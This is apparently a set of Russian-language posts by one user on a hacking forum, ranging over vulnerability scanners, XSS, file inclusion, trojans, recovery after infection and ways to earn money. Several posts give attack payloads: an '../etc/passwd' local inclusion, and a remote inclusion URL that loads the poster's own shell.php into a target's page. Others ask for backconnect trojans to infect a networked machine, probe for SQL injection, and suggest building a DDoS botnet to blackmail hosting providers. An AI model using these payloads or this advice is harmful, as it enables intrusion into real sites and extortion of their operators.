За такие деньги лучше юзать демо спайдер + сниффер http-пакетов. И как спайдер найдёт XSS - жмём паузу в нём и лезем в свой сниффер. Гемморой, но зато платить не надо
Кстати, с сегодлняшнего дня вышел XSpider 7.5 demo

Я бы сказал что он раскрученный, а не лучший    А лучший - это смотря какие возможности сравнивать, но это отдельная тема



Да, одного запуска сканера мало для взлома, и слава Богу!
А по XSS читай:
http://ezine. * .ru/ez!n3[1]_07.html
http://progers.ru/articles/87.htm
http://www.antichat.ru/crackchat/HTML

Ну... здесь только усердие и куча убитого на это дело времени помогут...

Вот прям так и написано было: ../infovinos/enlacesvinos.htm С свумя точками впереди?
А что выдаст при ../?

Можно попробовать ../../../../../../etc/passwd - локальный инклудинг. Или удалённый: http://www.sitecom/tienda/index.php?page=http://www.your_site.com/shell.php

http://www.your_site.com/shell.php - это ссылка на шелл на твоём сайте

А что он умеет?

Понадобилось протроянить тачку, находящуюся в сетке, выходящая в инет через шлюз. Значит нужен трой с поддержкой backconnection.

Никогда не приходилось их юзать, так что я даже названий не знаю. Подкиньте названия, а дальше как юзать и т.д. - это я разберусь - не ламер

Кроме ProRAT: его я знаю. Хочу просто иметь выбор

А ты, никак, решил показать свою грамотность? Ну расскажи что командной строки нет - это интерпретатор. Вот только нафига это? Никому не интересно читать ненужные уточнения

Потренировался бы на локальной тачке на пингвине или cygwin.

И ещё читай: тут в самом конце

У меня Опера 8.54 XP SP2 не со всеми апдейтами - и ничего не валит

У меня всё нормально предлагает скачать при клике в Опере.
Попробуй перехватчих закачки от reget deluxe поставить вместе с этим даунлоадером

jackjack
Это как? Тебе снился вещий сон что комп не поднимится, ты встал в холодном поту, побежал к компу но было уже позно?
Я сомневаюсь что система была так недавно установлена что дейстивительно не сделал бэкапа. Хотя девственно чистую систему следует тут же бэкапить!

Я с ней не работал, но на сколько мне извесно - поддерживается, да ещё в более широком режиме чем в XP!

Ну значит остаётся то что я говорил насчёт live-cd и прочего

Me My
Вообще-то тут хотя и тема для новичков, но не для таких уж совсем новичков: ты предлагаешь рассказывать тебе где какую кнопку нажать? Ищи в гугле. И можно на своём компе потестить, создав образ системы перед этим или используя виртуальную машину. И ещё не забудь купить словарик по инглишу и добро пожаловать на http://www.translate.ru

crazypalec
Сколько копеек в месяц зарабатываешь? Чесным путём много не заработаешь. А нечесным - это уже пища для мозга, можно и подумать
А если нет таких творческих данных чтоб красиво что-то оформлять? У меня со школы трёха про ИЗО была Да и дизайнеров сейчас - пруд пруди! И конкуренция сильная.. Тем более, я так полагаю, в этой теме ставку делают на заработок рассчитывая на знания в безопасности


4p4ch3
Создай ДДоС-армию и шантажируй всякие там хостинги
Или создай сеть proxy и толкай желающим
Но это всчё занимает много времени для подготовки. Хотя потом поддерживать намного легче будет

Надо было ставить прогу ShadowServer - и проблем бы не было
Можно восстановить из точки восстановления винды - откатить назад.
Используй ProcessGuard чтоб понять кто создаёт и порождает процессы, а также другие антируткит тулзы
Пробовал лечить комп загружаясь в Безопасном режиме? А загрузившись с live-cd диска?

Вообще, хороший админ должен делать бэкапы регулярно! А верней - автоматизировать регулярное создание бэкапа

А какие законные способы Вы имеете в виду в инете так чтоб не копейки приносили? Разве что искать баги и выкладывать их в iDefender?  

Я так полагаю, сам нашёл? Тогда свяжись с админами секлаба и security.nnov.ru и выложи это. И где-нибудь через сутки твой ник с найденой дырой будут красоваться на этих сайтах  

Впеолне возможно что через phpbb, особенно если права юзерам неверно выданы и один из юзеров может локально шариться по папкам других хостящихся. Тогда взломали один сайт и получили доступ ко всем остальным

Случаем создаётся не беря переменную строку из url?
Если нет и нельзя вообще убрать galery/ то никак не обойти...

Утилита от Microsoft devcon

devcon disable=net - вырубит все сетевухи (даже wi-fi)
devcon enable=net - включит их

можно ею же вырубать конкретные сетевухи, но несколько гимморойно сделано...

я выше немного стормозил: без кавычки вводил. Т.е. как раз php?id=18-1
Выдаёт error 404 но не от сервера, а от скрипта: специально готовая страница для error 404. Вот только всё равно ничё не даст наверное...

В том-то и дело что изучал: чтоб просканить один-единственный порт мне надо создать отдельный файл. Т.е. для каждого случая разных портов лазать файл редактировать или новый создавать.
Syn-сканирование вроде не поддерживает.

Почему тогда вознивает ошибка при ?id='17
?